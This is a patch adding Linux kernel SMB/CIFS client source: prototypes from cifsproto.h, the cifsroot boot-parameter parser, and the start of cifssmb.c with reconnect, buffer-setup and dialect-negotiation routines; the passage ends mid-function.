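++ * Note: the ctime/atime/mtime fields below are expected in NT time
++ * format (100-nanosecond units since 1601), e.g. as produced by
++ * cifs_UnixTimeToNT() declared above (an assumption based on callers).
++ */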
++struct cifs_unix_set_info_args {
++	__u64	ctime;
++	__u64	atime;
++	__u64	mtime;
++	__u64	mode;
++	kuid_t	uid;
++	kgid_t	gid;
++	dev_t	device;
++};
++
++extern int CIFSSMBUnixSetFileInfo(const unsigned int xid,
++				  struct cifs_tcon *tcon,
++				  const struct cifs_unix_set_info_args *args,
++				  u16 fid, u32 pid_of_opener);
++
++extern int CIFSSMBUnixSetPathInfo(const unsigned int xid,
++				  struct cifs_tcon *tcon, const char *file_name,
++				  const struct cifs_unix_set_info_args *args,
++				  const struct nls_table *nls_codepage,
++				  int remap);
++
++extern int CIFSSMBMkDir(const unsigned int xid, struct inode *inode,
++			umode_t mode, struct cifs_tcon *tcon,
++			const char *name, struct cifs_sb_info *cifs_sb);
++extern int CIFSSMBRmDir(const unsigned int xid, struct cifs_tcon *tcon,
++			const char *name, struct cifs_sb_info *cifs_sb);
++extern int CIFSPOSIXDelFile(const unsigned int xid, struct cifs_tcon *tcon,
++			const char *name, __u16 type,
++			const struct nls_table *nls_codepage,
++			int remap_special_chars);
++extern int CIFSSMBDelFile(const unsigned int xid, struct cifs_tcon *tcon,
++			  const char *name, struct cifs_sb_info *cifs_sb);
++extern int CIFSSMBRename(const unsigned int xid, struct cifs_tcon *tcon,
++			 const char *from_name, const char *to_name,
++			 struct cifs_sb_info *cifs_sb);
++extern int CIFSSMBRenameOpenFile(const unsigned int xid, struct cifs_tcon *tcon,
++				 int netfid, const char *target_name,
++				 const struct nls_table *nls_codepage,
++				 int remap_special_chars);
++extern int CIFSCreateHardLink(const unsigned int xid, struct cifs_tcon *tcon,
++			      const char *from_name, const char *to_name,
++			      struct cifs_sb_info *cifs_sb);
++extern int CIFSUnixCreateHardLink(const unsigned int xid,
++			struct cifs_tcon *tcon,
++			const char *fromName, const char *toName,
++			const struct nls_table *nls_codepage,
++			int remap_special_chars);
++extern int CIFSUnixCreateSymLink(const unsigned int xid,
++			struct cifs_tcon *tcon,
++			const char *fromName, const char *toName,
++			const struct nls_table *nls_codepage, int remap);
++extern int CIFSSMBUnixQuerySymLink(const unsigned int xid,
++			struct cifs_tcon *tcon,
++			const unsigned char *searchName, char **syminfo,
++			const struct nls_table *nls_codepage, int remap);
++extern int CIFSSMBQuerySymLink(const unsigned int xid, struct cifs_tcon *tcon,
++			       __u16 fid, char **symlinkinfo,
++			       const struct nls_table *nls_codepage);
++extern int CIFSSMB_set_compression(const unsigned int xid,
++				   struct cifs_tcon *tcon, __u16 fid);
++extern int CIFS_open(const unsigned int xid, struct cifs_open_parms *oparms,
++		     int *oplock, FILE_ALL_INFO *buf);
++extern int SMBLegacyOpen(const unsigned int xid, struct cifs_tcon *tcon,
++			const char *fileName, const int disposition,
++			const int access_flags, const int omode,
++			__u16 *netfid, int *pOplock, FILE_ALL_INFO *,
++			const struct nls_table *nls_codepage, int remap);
++extern int CIFSPOSIXCreate(const unsigned int xid, struct cifs_tcon *tcon,
++			u32 posix_flags, __u64 mode, __u16 *netfid,
++			FILE_UNIX_BASIC_INFO *pRetData,
++			__u32 *pOplock, const char *name,
++			const struct nls_table *nls_codepage, int remap);
++extern int CIFSSMBClose(const unsigned int xid, struct cifs_tcon *tcon,
++			const int smb_file_id);
++
++extern int CIFSSMBFlush(const unsigned int xid, struct cifs_tcon *tcon,
++			const int smb_file_id);
++
++extern int CIFSSMBRead(const unsigned int xid, struct cifs_io_parms *io_parms,
++			unsigned int *nbytes, char **buf,
++			int *return_buf_type);
++extern int CIFSSMBWrite(const unsigned int xid, struct cifs_io_parms *io_parms,
++			unsigned int *nbytes, const char *buf);
++extern int CIFSSMBWrite2(const unsigned int xid, struct cifs_io_parms *io_parms,
++			unsigned int *nbytes, struct kvec *iov, const int nvec);
++extern int CIFSGetSrvInodeNumber(const unsigned int xid, struct cifs_tcon *tcon,
++				 const char *search_name, __u64 *inode_number,
++				 const struct nls_table *nls_codepage,
++				 int remap);
++
++extern int cifs_lockv(const unsigned int xid, struct cifs_tcon *tcon,
++		      const __u16 netfid, const __u8 lock_type,
++		      const __u32 num_unlock, const __u32 num_lock,
++		      LOCKING_ANDX_RANGE *buf);
++extern int CIFSSMBLock(const unsigned int xid, struct cifs_tcon *tcon,
++			const __u16 netfid, const __u32 netpid, const __u64 len,
++			const __u64 offset, const __u32 numUnlock,
++			const __u32 numLock, const __u8 lockType,
++			const bool waitFlag, const __u8 oplock_level);
++extern int CIFSSMBPosixLock(const unsigned int xid, struct cifs_tcon *tcon,
++			const __u16 smb_file_id, const __u32 netpid,
++			const loff_t start_offset, const __u64 len,
++			struct file_lock *, const __u16 lock_type,
++			const bool waitFlag);
++extern int CIFSSMBTDis(const unsigned int xid, struct cifs_tcon *tcon);
++extern int CIFSSMBEcho(struct TCP_Server_Info *server);
++extern int CIFSSMBLogoff(const unsigned int xid, struct cifs_ses *ses);
++
++extern struct cifs_ses *sesInfoAlloc(void);
++extern void sesInfoFree(struct cifs_ses *);
++extern struct cifs_tcon *tconInfoAlloc(void);
++extern void tconInfoFree(struct cifs_tcon *);
++
++extern int cifs_sign_rqst(struct smb_rqst *rqst, struct TCP_Server_Info *server,
++		   __u32 *pexpected_response_sequence_number);
++extern int cifs_sign_smbv(struct kvec *iov, int n_vec, struct TCP_Server_Info *,
++			  __u32 *);
++extern int cifs_sign_smb(struct smb_hdr *, struct TCP_Server_Info *, __u32 *);
++extern int cifs_verify_signature(struct smb_rqst *rqst,
++				 struct TCP_Server_Info *server,
++				__u32 expected_sequence_number);
++extern int setup_ntlmv2_rsp(struct cifs_ses *, const struct nls_table *);
++extern void cifs_crypto_secmech_release(struct TCP_Server_Info *server);
++extern int calc_seckey(struct cifs_ses *);
++extern int generate_smb30signingkey(struct cifs_ses *ses,
++				    struct TCP_Server_Info *server);
++extern int generate_smb311signingkey(struct cifs_ses *ses,
++				     struct TCP_Server_Info *server);
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++extern int CIFSSMBCopy(unsigned int xid,
++			struct cifs_tcon *source_tcon,
++			const char *fromName,
++			const __u16 target_tid,
++			const char *toName, const int flags,
++			const struct nls_table *nls_codepage,
++			int remap_special_chars);
++extern ssize_t CIFSSMBQAllEAs(const unsigned int xid, struct cifs_tcon *tcon,
++			const unsigned char *searchName,
++			const unsigned char *ea_name, char *EAData,
++			size_t bufsize, struct cifs_sb_info *cifs_sb);
++extern int CIFSSMBSetEA(const unsigned int xid, struct cifs_tcon *tcon,
++		const char *fileName, const char *ea_name,
++		const void *ea_value, const __u16 ea_value_len,
++		const struct nls_table *nls_codepage,
++		struct cifs_sb_info *cifs_sb);
++extern int CIFSSMBGetCIFSACL(const unsigned int xid, struct cifs_tcon *tcon,
++			__u16 fid, struct cifs_ntsd **acl_inf, __u32 *buflen);
++extern int CIFSSMBSetCIFSACL(const unsigned int, struct cifs_tcon *, __u16,
++			struct cifs_ntsd *, __u32, int);
++extern int CIFSSMBGetPosixACL(const unsigned int xid, struct cifs_tcon *tcon,
++		const unsigned char *searchName,
++		char *acl_inf, const int buflen, const int acl_type,
++		const struct nls_table *nls_codepage, int remap_special_chars);
++extern int CIFSSMBSetPosixACL(const unsigned int xid, struct cifs_tcon *tcon,
++		const unsigned char *fileName,
++		const char *local_acl, const int buflen, const int acl_type,
++		const struct nls_table *nls_codepage, int remap_special_chars);
++extern int CIFSGetExtAttr(const unsigned int xid, struct cifs_tcon *tcon,
++			const int netfid, __u64 *pExtAttrBits, __u64 *pMask);
++#endif /* CIFS_ALLOW_INSECURE_LEGACY */
++extern void cifs_autodisable_serverino(struct cifs_sb_info *cifs_sb);
++extern bool couldbe_mf_symlink(const struct cifs_fattr *fattr);
++extern int check_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
++			      struct cifs_sb_info *cifs_sb,
++			      struct cifs_fattr *fattr,
++			      const unsigned char *path);
++extern int E_md4hash(const unsigned char *passwd, unsigned char *p16,
++			const struct nls_table *codepage);
++
++extern int
++cifs_setup_volume_info(struct smb3_fs_context *ctx, const char *mntopts, const char *devname);
++
++extern struct TCP_Server_Info *
++cifs_find_tcp_session(struct smb3_fs_context *ctx);
++
++extern void cifs_put_smb_ses(struct cifs_ses *ses);
++
++extern struct cifs_ses *
++cifs_get_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx);
++
++void cifs_readdata_release(struct kref *refcount);
++int cifs_async_readv(struct cifs_readdata *rdata);
++int cifs_readv_receive(struct TCP_Server_Info *server, struct mid_q_entry *mid);
++
++int cifs_async_writev(struct cifs_writedata *wdata,
++		      void (*release)(struct kref *kref));
++void cifs_writev_complete(struct work_struct *work);
++struct cifs_writedata *cifs_writedata_alloc(unsigned int nr_pages,
++						work_func_t complete);
++struct cifs_writedata *cifs_writedata_direct_alloc(struct page **pages,
++						work_func_t complete);
++void cifs_writedata_release(struct kref *refcount);
++int cifs_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
++			  struct cifs_sb_info *cifs_sb,
++			  const unsigned char *path, char *pbuf,
++			  unsigned int *pbytes_read);
++int cifs_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
++			   struct cifs_sb_info *cifs_sb,
++			   const unsigned char *path, char *pbuf,
++			   unsigned int *pbytes_written);
++int __cifs_calc_signature(struct smb_rqst *rqst,
++			struct TCP_Server_Info *server, char *signature,
++			struct shash_desc *shash);
++enum securityEnum cifs_select_sectype(struct TCP_Server_Info *,
++					enum securityEnum);
++struct cifs_aio_ctx *cifs_aio_ctx_alloc(void);
++void cifs_aio_ctx_release(struct kref *refcount);
++int setup_aio_ctx_iter(struct cifs_aio_ctx *ctx, struct iov_iter *iter, int rw);
++
++int cifs_alloc_hash(const char *name, struct shash_desc **sdesc);
++void cifs_free_hash(struct shash_desc **sdesc);
++
++void rqst_page_get_length(const struct smb_rqst *rqst, unsigned int page,
++			  unsigned int *len, unsigned int *offset);
++struct cifs_chan *
++cifs_ses_find_chan(struct cifs_ses *ses, struct TCP_Server_Info *server);
++int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses);
++bool is_server_using_iface(struct TCP_Server_Info *server,
++			   struct cifs_server_iface *iface);
++bool is_ses_using_iface(struct cifs_ses *ses, struct cifs_server_iface *iface);
++void cifs_ses_mark_for_reconnect(struct cifs_ses *ses);
++
++unsigned int
++cifs_ses_get_chan_index(struct cifs_ses *ses,
++			struct TCP_Server_Info *server);
++void
++cifs_chan_set_in_reconnect(struct cifs_ses *ses,
++			     struct TCP_Server_Info *server);
++void
++cifs_chan_clear_in_reconnect(struct cifs_ses *ses,
++			       struct TCP_Server_Info *server);
++bool
++cifs_chan_in_reconnect(struct cifs_ses *ses,
++			  struct TCP_Server_Info *server);
++void
++cifs_chan_set_need_reconnect(struct cifs_ses *ses,
++			     struct TCP_Server_Info *server);
++void
++cifs_chan_clear_need_reconnect(struct cifs_ses *ses,
++			       struct TCP_Server_Info *server);
++bool
++cifs_chan_needs_reconnect(struct cifs_ses *ses,
++			  struct TCP_Server_Info *server);
++bool
++cifs_chan_is_iface_active(struct cifs_ses *ses,
++			  struct TCP_Server_Info *server);
++int
++cifs_chan_update_iface(struct cifs_ses *ses, struct TCP_Server_Info *server);
++int
++SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_mount);
++
++void extract_unc_hostname(const char *unc, const char **h, size_t *len);
++int copy_path_name(char *dst, const char *src);
++int smb2_parse_query_directory(struct cifs_tcon *tcon, struct kvec *rsp_iov,
++			       int resp_buftype,
++			       struct cifs_search_info *srch_inf);
++
++struct super_block *cifs_get_tcp_super(struct TCP_Server_Info *server);
++void cifs_put_tcp_super(struct super_block *sb);
++int cifs_update_super_prepath(struct cifs_sb_info *cifs_sb, char *prefix);
++char *extract_hostname(const char *unc);
++char *extract_sharename(const char *unc);
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++static inline int get_dfs_path(const unsigned int xid, struct cifs_ses *ses,
++			       const char *old_path,
++			       const struct nls_table *nls_codepage,
++			       struct dfs_info3_param *referral, int remap)
++{
++	return dfs_cache_find(xid, ses, nls_codepage, remap, old_path,
++			      referral, NULL);
++}
++
++int match_target_ip(struct TCP_Server_Info *server,
++		    const char *share, size_t share_len,
++		    bool *result);
++int cifs_inval_name_dfs_link_error(const unsigned int xid,
++				   struct cifs_tcon *tcon,
++				   struct cifs_sb_info *cifs_sb,
++				   const char *full_path,
++				   bool *islink);
++#else
++static inline int cifs_inval_name_dfs_link_error(const unsigned int xid,
++				   struct cifs_tcon *tcon,
++				   struct cifs_sb_info *cifs_sb,
++				   const char *full_path,
++				   bool *islink)
++{
++	*islink = false;
++	return 0;
++}
++#endif
++
++static inline int cifs_create_options(struct cifs_sb_info *cifs_sb, int options)
++{
++	if (cifs_sb && (backup_cred(cifs_sb)))
++		return options | CREATE_OPEN_BACKUP_INTENT;
++	else
++		return options;
++}
++
++struct super_block *cifs_get_tcon_super(struct cifs_tcon *tcon);
++void cifs_put_tcon_super(struct super_block *sb);
++int cifs_wait_for_server_reconnect(struct TCP_Server_Info *server, bool retry);
++
++#endif			/* _CIFSPROTO_H */
+diff --git a/fs/smb/client/cifsroot.c b/fs/smb/client/cifsroot.c
+new file mode 100644
+index 0000000000000..56ec1b233f52e
+--- /dev/null
++++ b/fs/smb/client/cifsroot.c
+@@ -0,0 +1,94 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ * SMB root file system support
++ *
++ * Copyright (c) 2019 Paulo Alcantara <palcantara@suse.de>
++ */
++#include <linux/init.h>
++#include <linux/fs.h>
++#include <linux/types.h>
++#include <linux/ctype.h>
++#include <linux/string.h>
++#include <linux/root_dev.h>
++#include <linux/kernel.h>
++#include <linux/in.h>
++#include <linux/inet.h>
++#include <net/ipconfig.h>
++
++#define DEFAULT_MNT_OPTS \
++	"vers=1.0,cifsacl,mfsymlinks,rsize=1048576,wsize=65536,uid=0,gid=0," \
++	"hard,rootfs"
++
++static char root_dev[2048] __initdata = "";
++static char root_opts[1024] __initdata = DEFAULT_MNT_OPTS;
++
++static __be32 __init parse_srvaddr(char *start, char *end)
++{
++	/* TODO: ipv6 support */
++	char addr[sizeof("aaa.bbb.ccc.ddd")];
++	int i = 0;
++
++	while (start < end && i < sizeof(addr) - 1) {
++		if (isdigit(*start) || *start == '.')
++			addr[i++] = *start;
++		start++;
++	}
++	addr[i] = '\0';
++	return in_aton(addr);
++}
++
++/* cifsroot=//<server-ip>/<share>[,options] */
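++/*
++ * Illustrative example (hypothetical values):
++ *   cifsroot=//10.0.0.1/rootshare,username=user,password=pass
++ * mounts //10.0.0.1/rootshare as root, with DEFAULT_MNT_OPTS plus the
++ * given options appended.
++ */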
++static int __init cifs_root_setup(char *line)
++{
++	char *s;
++	int len;
++	__be32 srvaddr = htonl(INADDR_NONE);
++
++	ROOT_DEV = Root_CIFS;
++
++	if (strlen(line) > 3 && line[0] == '/' && line[1] == '/') {
++		s = strchr(&line[2], '/');
++		if (!s || s[1] == '\0')
++			return 1;
++
++		/* make s point to ',' or '\0' at end of line */
++		s = strchrnul(s, ',');
++		/* len is strlen(unc) + '\0' */
++		len = s - line + 1;
++		if (len > sizeof(root_dev)) {
++			pr_err("Root-CIFS: UNC path too long\n");
++			return 1;
++		}
++		strscpy(root_dev, line, len);
++		srvaddr = parse_srvaddr(&line[2], s);
++		if (*s) {
++			int n = snprintf(root_opts,
++					 sizeof(root_opts), "%s,%s",
++					 DEFAULT_MNT_OPTS, s + 1);
++			if (n >= sizeof(root_opts)) {
++				pr_err("Root-CIFS: mount options string too long\n");
++				root_opts[sizeof(root_opts)-1] = '\0';
++				return 1;
++			}
++		}
++	}
++
++	root_server_addr = srvaddr;
++
++	return 1;
++}
++
++__setup("cifsroot=", cifs_root_setup);
++
++int __init cifs_root_data(char **dev, char **opts)
++{
++	if (!root_dev[0] || root_server_addr == htonl(INADDR_NONE)) {
++		pr_err("Root-CIFS: no SMB server address\n");
++		return -1;
++	}
++
++	*dev = root_dev;
++	*opts = root_opts;
++
++	return 0;
++}
+diff --git a/fs/smb/client/cifssmb.c b/fs/smb/client/cifssmb.c
+new file mode 100644
+index 0000000000000..c90d4ec9292ca
+--- /dev/null
++++ b/fs/smb/client/cifssmb.c
+@@ -0,0 +1,5873 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2010
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ *   Contains the routines for constructing the SMB PDUs themselves
++ *
++ */
++
++/*
++ * SMB/CIFS PDU handling routines here - except for leftovers in connect.c.
++ * These are mostly routines that operate on a pathname, or on a tree id
++ * (mounted volume), but there are eight handle-based routines which must be
++ * treated slightly differently for reconnection purposes, since we never
++ * want to reuse a stale file handle and only the caller knows the file info.
++ */
++
++#include <linux/fs.h>
++#include <linux/kernel.h>
++#include <linux/vfs.h>
++#include <linux/slab.h>
++#include <linux/posix_acl_xattr.h>
++#include <linux/pagemap.h>
++#include <linux/swap.h>
++#include <linux/task_io_accounting_ops.h>
++#include <linux/uaccess.h>
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsacl.h"
++#include "cifsproto.h"
++#include "cifs_unicode.h"
++#include "cifs_debug.h"
++#include "fscache.h"
++#include "smbdirect.h"
++#ifdef CONFIG_CIFS_DFS_UPCALL
++#include "dfs_cache.h"
++#endif
++
++#ifdef CONFIG_CIFS_POSIX
++static struct {
++	int index;
++	char *name;
++} protocols[] = {
++	{CIFS_PROT, "\2NT LM 0.12"},
++	{POSIX_PROT, "\2POSIX 2"},
++	{BAD_PROT, "\2"}
++};
++#else
++static struct {
++	int index;
++	char *name;
++} protocols[] = {
++	{CIFS_PROT, "\2NT LM 0.12"},
++	{BAD_PROT, "\2"}
++};
++#endif
++
++/* define the number of elements in the cifs dialect array */
++#ifdef CONFIG_CIFS_POSIX
++#define CIFS_NUM_PROT 2
++#else /* not posix */
++#define CIFS_NUM_PROT 1
++#endif /* CIFS_POSIX */
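++/*
++ * Note that protocols[] has one more entry than CIFS_NUM_PROT: the
++ * BAD_PROT terminator ("\2") is never sent in the negotiate request.
++ */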
++
++
++/* reconnect the socket, tcon, and smb session if needed */
++static int
++cifs_reconnect_tcon(struct cifs_tcon *tcon, int smb_command)
++{
++	int rc;
++	struct cifs_ses *ses;
++	struct TCP_Server_Info *server;
++	struct nls_table *nls_codepage;
++
++	/*
++	 * SMBs NegProt, SessSetup, and uLogoff do not have a tcon yet, so the
++	 * tcp and smb session status is checked differently for those three -
++	 * in the calling routine.
++	 */
++	if (!tcon)
++		return 0;
++
++	ses = tcon->ses;
++	server = ses->server;
++
++	/*
++	 * only tree disconnect, open, and write (and ulogoff, which does not
++	 * have a tcon) are allowed as we start umount
++	 */
++	spin_lock(&tcon->tc_lock);
++	if (tcon->status == TID_EXITING) {
++		if (smb_command != SMB_COM_TREE_DISCONNECT) {
++			spin_unlock(&tcon->tc_lock);
++			cifs_dbg(FYI, "can not send cmd %d while umounting\n",
++				 smb_command);
++			return -ENODEV;
++		}
++	}
++	spin_unlock(&tcon->tc_lock);
++
++	rc = cifs_wait_for_server_reconnect(server, tcon->retry);
++	if (rc)
++		return rc;
++
++	spin_lock(&ses->chan_lock);
++	if (!cifs_chan_needs_reconnect(ses, server) && !tcon->need_reconnect) {
++		spin_unlock(&ses->chan_lock);
++		return 0;
++	}
++	spin_unlock(&ses->chan_lock);
++
++	nls_codepage = load_nls_default();
++
++	/*
++	 * Recheck after acquiring the mutex. If another thread is negotiating
++	 * and the server never sends an answer the socket will be closed
++	 * and tcpStatus set to reconnect.
++	 */
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsNeedReconnect) {
++		spin_unlock(&server->srv_lock);
++		rc = -EHOSTDOWN;
++		goto out;
++	}
++	spin_unlock(&server->srv_lock);
++
++	/*
++	 * need to prevent multiple threads trying to simultaneously
++	 * reconnect the same SMB session
++	 */
++	spin_lock(&ses->chan_lock);
++	if (!cifs_chan_needs_reconnect(ses, server)) {
++		spin_unlock(&ses->chan_lock);
++
++		/* this means that we only need to tree connect */
++		if (tcon->need_reconnect)
++			goto skip_sess_setup;
++
++		rc = -EHOSTDOWN;
++		goto out;
++	}
++	spin_unlock(&ses->chan_lock);
++
++	mutex_lock(&ses->session_mutex);
++	rc = cifs_negotiate_protocol(0, ses, server);
++	if (!rc)
++		rc = cifs_setup_session(0, ses, server, nls_codepage);
++
++	/* do we need to reconnect tcon? */
++	if (rc || !tcon->need_reconnect) {
++		mutex_unlock(&ses->session_mutex);
++		goto out;
++	}
++
++skip_sess_setup:
++	cifs_mark_open_files_invalid(tcon);
++	rc = cifs_tree_connect(0, tcon, nls_codepage);
++	mutex_unlock(&ses->session_mutex);
++	cifs_dbg(FYI, "reconnect tcon rc = %d\n", rc);
++
++	if (rc) {
++		pr_warn_once("reconnect tcon failed rc = %d\n", rc);
++		goto out;
++	}
++
++	atomic_inc(&tconInfoReconnectCount);
++
++	/* tell server Unix caps we support */
++	if (cap_unix(ses))
++		reset_cifs_unix_caps(0, tcon, NULL, NULL);
++
++	/*
++	 * Removed call to reopen open files here. It is safer (and faster) to
++	 * reopen files one at a time as needed in read and write.
++	 *
++	 * FIXME: what about file locks? don't we need to reclaim them ASAP?
++	 */
++
++out:
++	/*
++	 * Check if this is a handle-based operation, so we know whether we
++	 * can continue or not without returning to the caller to reset the
++	 * file handle
++	 */
++	switch (smb_command) {
++	case SMB_COM_READ_ANDX:
++	case SMB_COM_WRITE_ANDX:
++	case SMB_COM_CLOSE:
++	case SMB_COM_FIND_CLOSE2:
++	case SMB_COM_LOCKING_ANDX:
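++		/* tell the caller to reopen the file handle and resend */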
++		rc = -EAGAIN;
++	}
++
++	unload_nls(nls_codepage);
++	return rc;
++}
++
++/*
++ * Allocate and return a pointer to an SMB request buffer, and set basic
++ * SMB information in the SMB header. If the return code is zero, this
++ * function must have filled in the request_buf pointer.
++ */
++static int
++small_smb_init(int smb_command, int wct, struct cifs_tcon *tcon,
++		void **request_buf)
++{
++	int rc;
++
++	rc = cifs_reconnect_tcon(tcon, smb_command);
++	if (rc)
++		return rc;
++
++	*request_buf = cifs_small_buf_get();
++	if (*request_buf == NULL) {
++		/* BB should we add a retry in here if not a writepage? */
++		return -ENOMEM;
++	}
++
++	header_assemble((struct smb_hdr *) *request_buf, smb_command,
++			tcon, wct);
++
++	if (tcon != NULL)
++		cifs_stats_inc(&tcon->num_smbs_sent);
++
++	return 0;
++}
++
++int
++small_smb_init_no_tc(const int smb_command, const int wct,
++		     struct cifs_ses *ses, void **request_buf)
++{
++	int rc;
++	struct smb_hdr *buffer;
++
++	rc = small_smb_init(smb_command, wct, NULL, request_buf);
++	if (rc)
++		return rc;
++
++	buffer = (struct smb_hdr *)*request_buf;
++	buffer->Mid = get_next_mid(ses->server);
++	if (ses->capabilities & CAP_UNICODE)
++		buffer->Flags2 |= SMBFLG2_UNICODE;
++	if (ses->capabilities & CAP_STATUS32)
++		buffer->Flags2 |= SMBFLG2_ERR_STATUS;
++
++	/* uid, tid can stay at zero as set in header assemble */
++
++	/* BB add support for turning on signing when this function is
++	   used after the first of the session setup requests */
++
++	return rc;
++}
++
++/* If the return code is zero, this function must fill in request_buf pointer */
++static int
++__smb_init(int smb_command, int wct, struct cifs_tcon *tcon,
++			void **request_buf, void **response_buf)
++{
++	*request_buf = cifs_buf_get();
++	if (*request_buf == NULL) {
++		/* BB should we add a retry in here if not a writepage? */
++		return -ENOMEM;
++	}
++	/*
++	 * Although the original thought was we needed the response buf for
++	 * potential retries of smb operations, it turns out we can determine
++	 * from the mid flags when the request buffer can be resent without
++	 * having to use a second distinct buffer for the response.
++	 */
++	if (response_buf)
++		*response_buf = *request_buf;
++
++	header_assemble((struct smb_hdr *) *request_buf, smb_command, tcon,
++			wct);
++
++	if (tcon != NULL)
++		cifs_stats_inc(&tcon->num_smbs_sent);
++
++	return 0;
++}
++
++/* If the return code is zero, this function must fill in request_buf pointer */
++static int
++smb_init(int smb_command, int wct, struct cifs_tcon *tcon,
++	 void **request_buf, void **response_buf)
++{
++	int rc;
++
++	rc = cifs_reconnect_tcon(tcon, smb_command);
++	if (rc)
++		return rc;
++
++	return __smb_init(smb_command, wct, tcon, request_buf, response_buf);
++}
++
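++/*
++ * Variant of smb_init() that never triggers a reconnect: if the channel
++ * or the tcon needs reconnecting, it fails fast with -EHOSTDOWN instead.
++ */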
++static int
++smb_init_no_reconnect(int smb_command, int wct, struct cifs_tcon *tcon,
++			void **request_buf, void **response_buf)
++{
++	spin_lock(&tcon->ses->chan_lock);
++	if (cifs_chan_needs_reconnect(tcon->ses, tcon->ses->server) ||
++	    tcon->need_reconnect) {
++		spin_unlock(&tcon->ses->chan_lock);
++		return -EHOSTDOWN;
++	}
++	spin_unlock(&tcon->ses->chan_lock);
++
++	return __smb_init(smb_command, wct, tcon, request_buf, response_buf);
++}
++
++static int validate_t2(struct smb_t2_rsp *pSMB)
++{
++	unsigned int total_size;
++
++	/* check for plausible wct */
++	if (pSMB->hdr.WordCount < 10)
++		goto vt2_err;
++
++	/* check for parm and data offset going beyond end of smb */
++	if (get_unaligned_le16(&pSMB->t2_rsp.ParameterOffset) > 1024 ||
++	    get_unaligned_le16(&pSMB->t2_rsp.DataOffset) > 1024)
++		goto vt2_err;
++
++	total_size = get_unaligned_le16(&pSMB->t2_rsp.ParameterCount);
++	if (total_size >= 512)
++		goto vt2_err;
++
++	/* check that bcc is at least as big as parms + data, and that it is
++	 * less than negotiated smb buffer
++	 */
++	total_size += get_unaligned_le16(&pSMB->t2_rsp.DataCount);
++	if (total_size > get_bcc(&pSMB->hdr) ||
++	    total_size >= CIFSMaxBufSize + MAX_CIFS_HDR_SIZE)
++		goto vt2_err;
++
++	return 0;
++vt2_err:
++	cifs_dump_mem("Invalid transact2 SMB: ", (char *)pSMB,
++		sizeof(struct smb_t2_rsp) + 16);
++	return -EINVAL;
++}
++
++static int
++decode_ext_sec_blob(struct cifs_ses *ses, NEGOTIATE_RSP *pSMBr)
++{
++	int	rc = 0;
++	u16	count;
++	char	*guid = pSMBr->u.extended_response.GUID;
++	struct TCP_Server_Info *server = ses->server;
++
++	count = get_bcc(&pSMBr->hdr);
++	if (count < SMB1_CLIENT_GUID_SIZE)
++		return -EIO;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	if (server->srv_count > 1) {
++		spin_unlock(&cifs_tcp_ses_lock);
++		if (memcmp(server->server_GUID, guid, SMB1_CLIENT_GUID_SIZE) != 0) {
++			cifs_dbg(FYI, "server UID changed\n");
++			memcpy(server->server_GUID, guid, SMB1_CLIENT_GUID_SIZE);
++		}
++	} else {
++		spin_unlock(&cifs_tcp_ses_lock);
++		memcpy(server->server_GUID, guid, SMB1_CLIENT_GUID_SIZE);
++	}
++
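++	/*
++	 * If nothing follows the GUID there is no negTokenInit blob to
++	 * parse, which implies the server only supports raw NTLMSSP.
++	 */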
++	if (count == SMB1_CLIENT_GUID_SIZE) {
++		server->sec_ntlmssp = true;
++	} else {
++		count -= SMB1_CLIENT_GUID_SIZE;
++		rc = decode_negTokenInit(
++			pSMBr->u.extended_response.SecurityBlob, count, server);
++		if (rc != 1)
++			return -EINVAL;
++	}
++
++	return 0;
++}
++
++static bool
++should_set_ext_sec_flag(enum securityEnum sectype)
++{
++	switch (sectype) {
++	case RawNTLMSSP:
++	case Kerberos:
++		return true;
++	case Unspecified:
++		if (global_secflags &
++		    (CIFSSEC_MAY_KRB5 | CIFSSEC_MAY_NTLMSSP))
++			return true;
++		fallthrough;
++	default:
++		return false;
++	}
++}
++
++int
++CIFSSMBNegotiate(const unsigned int xid,
++		 struct cifs_ses *ses,
++		 struct TCP_Server_Info *server)
++{
++	NEGOTIATE_REQ *pSMB;
++	NEGOTIATE_RSP *pSMBr;
++	int rc = 0;
++	int bytes_returned;
++	int i;
++	u16 count;
++
++	if (!server) {
++		WARN(1, "%s: server is NULL!\n", __func__);
++		return -EIO;
++	}
++
++	rc = smb_init(SMB_COM_NEGOTIATE, 0, NULL /* no tcon yet */,
++		      (void **) &pSMB, (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	pSMB->hdr.Mid = get_next_mid(server);
++	pSMB->hdr.Flags2 |= (SMBFLG2_UNICODE | SMBFLG2_ERR_STATUS);
++
++	if (should_set_ext_sec_flag(ses->sectype)) {
++		cifs_dbg(FYI, "Requesting extended security\n");
++		pSMB->hdr.Flags2 |= SMBFLG2_EXT_SEC;
++	}
++
++	count = 0;
++	/*
++	 * We know that all the name entries in the protocols array
++	 * are short (< 16 bytes anyway) and are NUL terminated.
++	 */
++	for (i = 0; i < CIFS_NUM_PROT; i++) {
++		size_t len = strlen(protocols[i].name) + 1;
++
++		memcpy(&pSMB->DialectsArray[count], protocols[i].name, len);
++		count += len;
++	}
++	inc_rfc1001_len(pSMB, count);
++	pSMB->ByteCount = cpu_to_le16(count);
++
++	rc = SendReceive(xid, ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc != 0)
++		goto neg_err_exit;
++
++	server->dialect = le16_to_cpu(pSMBr->DialectIndex);
++	cifs_dbg(FYI, "Dialect: %d\n", server->dialect);
++	/* Check wct = 1 error case */
++	if ((pSMBr->hdr.WordCount <= 13) || (server->dialect == BAD_PROT)) {
++		/*
++		 * core returns wct = 1, but we do not ask for core - otherwise
++		 * a small wct comes only when the dialect index is -1,
++		 * indicating we could not negotiate a common dialect
++		 */
++		rc = -EOPNOTSUPP;
++		goto neg_err_exit;
